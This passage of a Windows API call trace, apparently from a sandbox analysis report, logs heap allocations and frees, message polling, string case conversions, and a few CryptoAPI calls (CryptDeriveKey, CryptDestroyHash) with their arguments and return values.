returned 0x34aa910 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.722] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.722] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.722] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.722] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.722] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.723] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.723] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.723] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.723] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.723] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.724] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.724] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.724] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.724] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0258.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.729] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.729] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.730] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.730] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.730] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.731] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.731] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.731] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0258.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0258.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.733] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0258.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.734] CryptDestroyHash (hHash=0xaa5820) returned 1 [0258.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.734] RtlAllocateHeap 